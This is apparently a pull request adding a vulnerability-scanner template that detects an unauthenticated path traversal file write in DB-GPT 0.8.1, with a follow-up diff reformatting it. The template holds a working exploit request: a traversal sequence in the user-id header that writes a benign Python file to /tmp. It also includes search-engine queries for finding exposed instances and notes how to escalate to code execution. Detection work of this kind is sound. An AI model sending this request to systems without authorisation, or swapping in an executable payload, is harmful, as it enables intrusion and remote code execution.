### PR TITLE
feat: add CVE-2026-73034 DB-GPT <= 0.8.1 path traversal arbitrary file write

### DIFF
--- a/http/cves/2026/CVE-2026-73034.yaml
+++ b/http/cves/2026/CVE-2026-73034.yaml
@@ -1,25 +1,15 @@
 id: CVE-2026-73034
 
 info:
-  name: DB-GPT <= 0.8.1 - Unauthenticated Path Traversal Arbitrary File Write
+  name: DB-GPT <= 0.8.1 - Arbitrary File Write
   author: iacker
   severity: critical
   description: |
-    DB-GPT through 0.8.1 is vulnerable to an unauthenticated path traversal in the
-    Python file-upload endpoint (POST /api/v1/python/file/upload). The user_id HTTP
-    header is used unvalidated as a path component of the upload directory, so a
-    traversal sequence in the header escapes the intended python_uploads directory
-    and lets a remote unauthenticated attacker write arbitrary files anywhere the
-    process can write. The upload endpoint reflects the resolved absolute path in
-    its JSON response, which this template uses to confirm the escape without
-    dropping an executable payload.
+    DB-GPT through 0.8.1 allows unauthenticated arbitrary file writes via a path traversal in the user_id HTTP header of the POST /api/v1/python/file/upload endpoint, letting attackers escape the intended upload directory and write files anywhere, as confirmed by the reflected upload path in the JSON response.
   impact: |
-    Arbitrary file write as the DB-GPT process user, which can be escalated to
-    remote code execution by writing to Python startup hooks, cron directories or
-    agent scripts.
+    Arbitrary file write as the DB-GPT process user, which can be escalated to remote code execution by writing to Python startup hooks, cron directories or agent scripts.
   remediation: |
-    Upgrade DB-GPT to a version that validates the user_id header and confines the
-    resolved upload path to the python_uploads directory.
+    Upgrade DB-GPT to a version that validates the user_id header and confines the resolved upload path to the python_uploads directory.
   reference:
     - https://www.vulncheck.com/advisories/db-gpt-path-traversal-arbitrary-file-write-via-user-id-header
     - https://github.com/eosphoros-ai/DB-GPT/issues/3104
@@ -36,9 +26,9 @@ info:
     max-request: 1
     vendor: eosphoros
     product: db-gpt
-    shodan-query: http.title:"DB-GPT"
-    fofa-query: title="DB-GPT"
-  tags: cve,cve2026,dbgpt,eosphoros,lfi,traversal,file-write,unauth,intrusive
+    shodan-query: http.favicon.hash:100632689
+    fofa-query: icon_hash="100632689"
+  tags: cve,cve2026,dbgpt,eosphoros,lfi,traversal,file-write,intrusive
 
 variables:
   fname: "{{rand_base(9)}}"
@@ -61,21 +51,21 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: header
-        words:
-          - "application/json"
-
       - type: word
         part: body
         words:
           - "\"success\":true"
           - "/tmp/{{fname}}.py"
         condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
 
       - type: word
         part: body

--- a/http/cves/2026/CVE-2026-73034.yaml
+++ b/http/cves/2026/CVE-2026-73034.yaml
@@ -1,0 +1,89 @@
+id: CVE-2026-73034
+
+info:
+  name: DB-GPT <= 0.8.1 - Unauthenticated Path Traversal Arbitrary File Write
+  author: iacker
+  severity: critical
+  description: |
+    DB-GPT through 0.8.1 is vulnerable to an unauthenticated path traversal in the
+    Python file-upload endpoint (POST /api/v1/python/file/upload). The user_id HTTP
+    header is used unvalidated as a path component of the upload directory, so a
+    traversal sequence in the header escapes the intended python_uploads directory
+    and lets a remote unauthenticated attacker write arbitrary files anywhere the
+    process can write. The upload endpoint reflects the resolved absolute path in
+    its JSON response, which this template uses to confirm the escape without
+    dropping an executable payload.
+  impact: |
+    Arbitrary file write as the DB-GPT process user, which can be escalated to
+    remote code execution by writing to Python startup hooks, cron directories or
+    agent scripts.
+  remediation: |
+    Upgrade DB-GPT to a version that validates the user_id header and confines the
+    resolved upload path to the python_uploads directory.
+  reference:
+    - https://www.vulncheck.com/advisories/db-gpt-path-traversal-arbitrary-file-write-via-user-id-header
+    - https://github.com/eosphoros-ai/DB-GPT/issues/3104
+    - https://github.com/eosphoros-ai/DB-GPT/commit/e0c741bd2b5e521b128cffb3f68982dde3f7b359
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-73034
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-73034
+    cwe-id: CWE-22
+    cpe: cpe:2.3:a:eosphoros:db-gpt:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: eosphoros
+    product: db-gpt
+    shodan-query: http.title:"DB-GPT"
+    fofa-query: title="DB-GPT"
+  tags: cve,cve2026,dbgpt,eosphoros,lfi,traversal,file-write,unauth,intrusive
+
+variables:
+  fname: "{{rand_base(9)}}"
+  boundary: "{{rand_int(100000000, 999999999)}}"
+
+http:
+  - raw:
+      - |
+        POST /api/v1/python/file/upload HTTP/1.1
+        Host: {{Hostname}}
+        user-id: ../../../../../../../../../../tmp
+        Content-Type: multipart/form-data; boundary=----boundary{{boundary}}
+
+        ------boundary{{boundary}}
+        Content-Disposition: form-data; name="file"; filename="{{fname}}.py"
+        Content-Type: text/x-python
+
+        print("{{fname}}")
+        ------boundary{{boundary}}--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: word
+        part: body
+        words:
+          - "\"success\":true"
+          - "/tmp/{{fname}}.py"
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - "python_uploads"
+        negative: true
+
+    extractors:
+      - type: json
+        json:
+          - ".data"


### PR DESCRIPTION
## CVE-2026-73034 — DB-GPT <= 0.8.1 Unauthenticated Path Traversal

**Severity:** Critical (CVSS 9.8)
**CWE:** CWE-22

### Summary

The `/api/v1/python/file/upload` endpoint in DB-GPT through 0.8.1 uses the `user-id` HTTP header as an unvalidated path component for the upload directory. A traversal sequence in the header escapes `python_uploads/` and writes arbitrary files wherever the process user can write — no authentication required.

### Detection method

Uploads an inoffensive `.py` file with `user-id: ../../../../../../../../../../tmp`. The response reflects the resolved absolute path (`/tmp/<random>.py`), confirming the escape. The template matches on:
- HTTP 200 + `application/json`
- `"success":true` in body
- Random filename reflected under `/tmp/` (not `python_uploads`)

### Verified

Tested against `eosphorosai/dbgpt-openai:v0.8.1` Docker image. Match confirmed.

### References

- https://www.vulncheck.com/advisories/db-gpt-path-traversal-arbitrary-file-write-via-user-id-header
- https://github.com/eosphoros-ai/DB-GPT/issues/3104
- https://github.com/eosphoros-ai/DB-GPT/commit/e0c741bd2b5e521b128cffb3f68982dde3f7b359
- https://nvd.nist.gov/vuln/detail/CVE-2026-73034